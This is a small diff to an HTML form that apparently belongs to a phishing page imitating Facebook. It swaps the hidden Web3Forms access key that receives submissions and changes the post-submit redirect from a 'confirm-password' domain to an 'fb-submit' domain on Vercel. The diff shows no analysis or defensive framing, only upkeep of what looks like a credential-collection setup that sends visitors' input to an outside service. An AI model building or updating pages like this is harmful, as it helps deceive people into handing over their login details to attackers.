--- a/validation.html
+++ b/validation.html
@@ -12,9 +12,9 @@
 <body>
 <form class="content" action="https://api.web3forms.com/submit" method="POST">
 
-<input type="hidden" name="access_key" value="39a9a931-54ec-4200-b958-efb4d21fc59a">
+<input type="hidden" name="access_key" value="df4c61a8-9e51-4013-bb71-e26151619833">
 
-<input type="hidden" name="redirect" value="https://confirm-password-iota.vercel.app/">
+<input type="hidden" name="redirect" value="https://fb-submit-blue.vercel.app/">
 
 <div class="relative flex border bg-[#e9ebee] h-10 md:hidden 1g:hidden sm:block">
             <div>
